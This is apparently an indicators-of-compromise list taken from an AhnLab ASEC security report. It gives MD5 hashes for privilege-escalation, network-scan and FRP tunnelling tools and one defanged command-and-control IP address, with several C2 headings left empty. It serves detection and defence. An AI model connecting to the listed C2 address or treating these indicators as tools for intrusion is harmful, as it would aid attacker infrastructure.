88bef25e4958d0a198a2cc0d921e4384
c908340bf152b96dc0f270eb6d39437f
2c3de1cefe5cd2a5315a9c9970277bd7
e5b626c4b172065005d04205b026e446
27ec6fb6739c4886b3c9e21b6b9041b6
612585fa3ada349a02bc97d4c60de784
21c7b2e6e0fb603c5fdd33781ac84b8f
c44457653b2c69933e04734fe31ff699
e31b7d841b1865e11eab056e70416f1a
69c7d9025fa3841c4cd69db1353179cf
fca13226da57b33f95bf3faad1004ee0
af002abd289296572d8afadfca809294
e981219f6ba673e977c5c1771f86b189
f978d05f1ebeb5df334f395d58a7e108
e3af60f483774014c43a7617c44d05e7
c802dd3d8732d9834c5a558e9d39ed37
07191f554ed5d9025bc85ee1bf51f975
61a687b0bea0ef97224c7bd2df118b87
…(omitted)
– Privilege Escalation
4bafbdca775375283a90f47952e182d9
937435bbcbc3670430bb762c56c7b329
75fe1b6536e94aaee132c8d022e14f85
d6cb8b66f7a9f3b26b4a98acb2f9d0c5
323a36c23e61c6b37f28abfd5b7e5dfe
– Network Scan
5e0845a9f08c1cfc7966824758b6953a
f01a9a2d1e31332ed36c1a4d2839f412
d4d8c9be9a4a6499d254e845c6835f5f
– FRP
- C2 and URL (Abused Korean company servers are not listed)
– Download C2
91.217.139[.]117
– Upload C2
– FRP & LCX C2
– Backdoor C2
Source: https://asec.ahnlab.com/en/47455/